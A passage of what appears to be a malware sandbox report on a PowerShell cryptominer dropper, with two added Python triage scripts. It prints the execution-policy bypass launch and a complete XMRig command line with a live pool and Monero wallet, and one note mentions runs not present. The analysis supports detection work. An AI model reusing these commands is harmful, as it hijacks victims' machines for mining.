powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_40oj0wqt.dcj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:20
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2940 wrote to memory of 4740 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2940 wrote to memory of 4740 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_04ehuu2p.ykl.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:21
Platform
win11-20240426-en
Max time kernel
1798s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2688 wrote to memory of 2744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2688 wrote to memory of 2744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xebruu3r.qls.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:29
Platform
win10v2004-20240226-en
Max time kernel
1794s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 868 wrote to memory of 4592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 868 wrote to memory of 4592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4288 --field-trial-handle=2272,i,4858140932023865871,5726683989663339295,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1408 --field-trial-handle=2272,i,4858140932023865871,5726683989663339295,262144 --variations-seed-version /prefetch:8
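An added triage example, not part of the sandbox report: it parses the two command lines above (copied into the script as constructed input) to pull out the miner's pool, TLS use, algorithm, coin, wallet and worker, and to flag the PowerShell launch flags and the interpreter-to-miner parent link. `-a rx` selects RandomX; the SeLockMemoryPrivilege requests in the AdjustPrivilegeToken table are XMRig enabling large pages for it. The parent/child link between PID 868 and PID 4592 is inferred from the WriteProcessMemory row and is an assumption; the `COIN:WALLET.WORKER` login shape is parsed as it appears in the report.

```python
from __future__ import annotations
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed sample: the two command lines the sandbox listed for this run.
# PIDs come from the "PID 868 wrote to memory of 4592" row; treating 868 as the
# parent of 4592 is an assumption drawn from that row, not a field the report exports.
SAMPLE_PROCESSES = [
    {"pid": 868, "ppid": None,
     "cmdline": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"'},
    {"pid": 4592, "ppid": 868,
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
                r'-o stratum+ssl://rx.unmineable.com:443 '
                r'-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x'},
]

# Quote-aware split for Windows command lines: a double-quoted run is one token,
# everything else splits on whitespace; backslash is not an escape character.
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')

def split_cmdline(cmdline: str) -> list[str]:
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]

# XMRig's pool and identity options, short and long spellings.
_XMRIG_OPTS = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
               "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass"}

def parse_xmrig_opts(tokens: list[str]) -> dict[str, str]:
    opts, i = {}, 1                                   # tokens[0] is the executable
    while i < len(tokens):
        name, eq, inline = tokens[i].partition("=")   # accepts "--url=..." and "-o ..."
        if name in _XMRIG_OPTS and eq:
            opts[_XMRIG_OPTS[name]] = inline
        elif name in _XMRIG_OPTS and i + 1 < len(tokens):
            opts[_XMRIG_OPTS[name]] = tokens[i + 1]
            i += 1
        i += 1
    return opts

# A standard Monero mainnet address is 95 base58 characters starting with 4
# (subaddresses start with 8); base58 has no 0, O, I or l.
_MONERO_ADDR = re.compile(r"[48][1-9A-HJ-NP-Za-km-z]{94}")

@dataclass
class MinerConfig:
    exe: str
    algo: str | None
    pool_host: str | None
    pool_port: int | None
    tls: bool
    coin: str | None
    wallet: str
    worker: str | None
    wallet_is_monero_address: bool

def miner_config(tokens: list[str]) -> MinerConfig:
    opts = parse_xmrig_opts(tokens)
    url = urlsplit(opts.get("url", ""))
    coin, sep, rest = opts.get("user", "").partition(":")   # COIN:WALLET.WORKER as seen in this report
    if not sep:
        coin, rest = None, coin
    wallet, _, worker = rest.partition(".")
    return MinerConfig(exe=tokens[0], algo=opts.get("algo"),
                       pool_host=url.hostname, pool_port=url.port,
                       tls=url.scheme.endswith(("+ssl", "+tls")),
                       coin=coin, wallet=wallet, worker=worker or None,
                       wallet_is_monero_address=bool(_MONERO_ADDR.fullmatch(wallet)))

_TEMP = "\\appdata\\local\\temp\\"

def powershell_findings(tokens: list[str]) -> list[str]:
    findings = []
    for i, tok in enumerate(t.lower() for t in tokens[:-1]):
        nxt = tokens[i + 1]
        # powershell.exe accepts unambiguous prefixes: -ep, -ex, -exec all mean -ExecutionPolicy
        if tok in ("-executionpolicy", "-ep", "-ex", "-exec") and nxt.lower() in ("bypass", "unrestricted"):
            findings.append(f"execution policy overridden on the command line ({nxt})")
        if tok in ("-file", "-f") and _TEMP in nxt.lower():
            findings.append(f"script run from user Temp: {nxt}")
    return findings

def triage(processes: list[dict]) -> dict:
    by_pid = {p["pid"]: p for p in processes}
    findings, miners = [], []
    for p in processes:
        tokens = split_cmdline(p["cmdline"])
        if not tokens:
            continue
        if tokens[0].lower().endswith("powershell.exe"):
            findings += [f"pid {p['pid']}: {f}" for f in powershell_findings(tokens)]
        # Key on the stratum URL rather than the file name: a renamed xmrig.exe still names its pool.
        if parse_xmrig_opts(tokens).get("url", "").startswith("stratum"):
            cfg = miner_config(tokens)
            miners.append(cfg)
            parent = by_pid.get(p["ppid"])
            if parent and split_cmdline(parent["cmdline"])[0].lower().endswith("powershell.exe"):
                findings.append(f"pid {p['pid']}: miner spawned by script interpreter pid {parent['pid']}")
            if _TEMP in cfg.exe.lower():
                findings.append(f"pid {p['pid']}: miner executed from user Temp: {cfg.exe}")
    return {"findings": findings, "miners": miners}

if __name__ == "__main__":
    result = triage(SAMPLE_PROCESSES)
    for m in result["miners"]:
        print(f"pool={m.pool_host}:{m.pool_port} tls={m.tls} algo={m.algo} coin={m.coin} worker={m.worker}")
    print("\n".join(result["findings"]))
```

The same function applies unchanged to the behavioral10 and behavioral23 command lines further down, which differ from this run only in PID and script file name; the wallet and worker string are the stable indicator across all runs.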
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| FR | 142.250.178.138:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | 138.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 13.107.246.64:443 | N/A | tcp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | N/A | tcp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
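An added example, not from the report: it sorts this run's Network rows (a subset copied above as constructed input) into the payload download (github.com plus objects.githubusercontent.com, the host that serves GitHub release assets), the mining pool named on the miner's command line, browser/OS background traffic, and unattributed flows; decodes the sandbox's in-addr.arpa reverse lookups back to the IPs they name, so addresses that were looked up but never appear as a direct flow stand out; and checks that the download precedes the first pool connection. Treating row order as first-seen order and the background-host list are assumptions.

```python
from __future__ import annotations

# Constructed sample: a subset of this run's Network table, in the order the
# report lists the rows (treated here as first-seen order, an assumption).
SAMPLE_NETWORK = [
    ("US", "8.8.8.8:53", "github.com", "udp"),
    ("GB", "20.26.156.215:443", "github.com", "tcp"),
    ("US", "8.8.8.8:53", "objects.githubusercontent.com", "udp"),
    ("US", "185.199.108.133:443", "objects.githubusercontent.com", "tcp"),
    ("US", "8.8.8.8:53", "215.156.26.20.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "154.239.44.20.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "133.108.199.185.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "chromewebstore.googleapis.com", "udp"),
    ("FR", "142.250.178.138:443", "chromewebstore.googleapis.com", "tcp"),
    ("US", "8.8.8.8:53", "pki.goog", "udp"),
    ("US", "216.239.32.29:80", "pki.goog", "tcp"),
    ("US", "8.8.8.8:53", "rx.unmineable.com", "udp"),
    ("GB", "161.35.34.195:443", "rx.unmineable.com", "tcp"),
    ("US", "8.8.8.8:53", "195.34.35.161.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "149.220.183.52.in-addr.arpa", "udp"),
    ("US", "13.107.246.64:443", "", "tcp"),
    ("NL", "52.142.223.178:80", "", "tcp"),
]

# Host roles. POOL_HOSTS is the pool from the miner command line in this report;
# objects.githubusercontent.com serves GitHub release assets; BACKGROUND_HOSTS is
# an assumption about browser/OS traffic on the sandbox image.
POOL_HOSTS = {"rx.unmineable.com"}
PAYLOAD_HOSTS = {"github.com", "objects.githubusercontent.com"}
BACKGROUND_HOSTS = {"pki.goog", "chromewebstore.googleapis.com", "g.bing.com", "www.bing.com"}

def ptr_to_ip(name: str) -> str | None:
    """'195.34.35.161.in-addr.arpa' -> '161.35.34.195'; None if not an IPv4 PTR name."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    labels = name[: -len(suffix)].split(".")
    if len(labels) != 4 or not all(l.isdigit() and int(l) <= 255 for l in labels):
        return None
    return ".".join(reversed(labels))

def triage_network(rows: list[tuple[str, str, str, str]]) -> dict:
    direct: dict[str, dict] = {}   # ip -> first non-DNS flow to it
    ptr_ips: set[str] = set()      # addresses the sandbox reverse-resolved
    first_tcp: dict[str, int] = {} # domain -> index of its first tcp flow
    for idx, (_country, dest, domain, proto) in enumerate(rows):
        ip, _, port = dest.rpartition(":")
        reverse = ptr_to_ip(domain)
        if reverse:
            ptr_ips.add(reverse)
            continue
        if proto == "udp" and port == "53":
            continue                # forward lookup; the answer shows up as the tcp row
        direct.setdefault(ip, {"ip": ip, "port": int(port), "proto": proto, "domain": domain or None})
        if proto == "tcp" and domain:
            first_tcp.setdefault(domain, idx)

    buckets: dict = {"pool": [], "payload": [], "background": [], "unattributed": []}
    for entry in direct.values():
        d = entry["domain"]
        key = ("pool" if d in POOL_HOSTS else "payload" if d in PAYLOAD_HOSTS
               else "background" if d in BACKGROUND_HOSTS else "unattributed")
        buckets[key].append(entry)

    def earliest(hosts: set[str]) -> int | None:
        hits = [first_tcp[h] for h in hosts if h in first_tcp]
        return min(hits) if hits else None

    download, pool = earliest(PAYLOAD_HOSTS), earliest(POOL_HOSTS)
    buckets["payload_before_pool"] = download is not None and pool is not None and download < pool
    # Reverse-resolved but never seen as a direct flow: traffic the table does not otherwise show.
    buckets["ptr_only"] = sorted(ptr_ips - set(direct))
    return buckets

if __name__ == "__main__":
    for k, v in triage_network(SAMPLE_NETWORK).items():
        print(k, v)
```

The actionable output is the pool bucket (host, IP and port 443 over TLS, so the stratum traffic is not visible as plaintext) and the ptr_only list, which is where to look when a flow is missing from the table; the payload bucket only shows where the binary came from, not that GitHub itself is hostile.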
Files
memory/868-0-0x00007FFDB9F93000-0x00007FFDB9F95000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m2oxr122.wbe.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/868-10-0x0000028CB6DA0000-0x0000028CB6DC2000-memory.dmp
memory/868-11-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmp
memory/868-12-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmp
memory/868-13-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmp
memory/868-15-0x0000028CB6E20000-0x0000028CB6E32000-memory.dmp
memory/868-16-0x0000028CB6E10000-0x0000028CB6E1A000-memory.dmp
memory/868-40-0x00007FFDB9F93000-0x00007FFDB9F95000-memory.dmp
memory/868-41-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4592-49-0x0000019EC0790000-0x0000019EC07B0000-memory.dmp
memory/868-50-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmp
memory/4592-51-0x0000019EC07D0000-0x0000019EC07F0000-memory.dmp
memory/868-52-0x00007FFDB9F90000-0x00007FFDBAA51000-memory.dmp
memory/4592-53-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-54-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-57-0x0000019EC0810000-0x0000019EC0830000-memory.dmp
memory/4592-55-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-56-0x0000019EC07F0000-0x0000019EC0810000-memory.dmp
memory/4592-58-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-59-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-61-0x0000019EC0810000-0x0000019EC0830000-memory.dmp
memory/4592-60-0x0000019EC07F0000-0x0000019EC0810000-memory.dmp
memory/4592-62-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-63-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-64-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-65-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-66-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-67-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-68-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-69-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-70-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-71-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-72-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-73-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-74-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
memory/4592-75-0x00007FF79FAD0000-0x00007FF7A0703000-memory.dmp
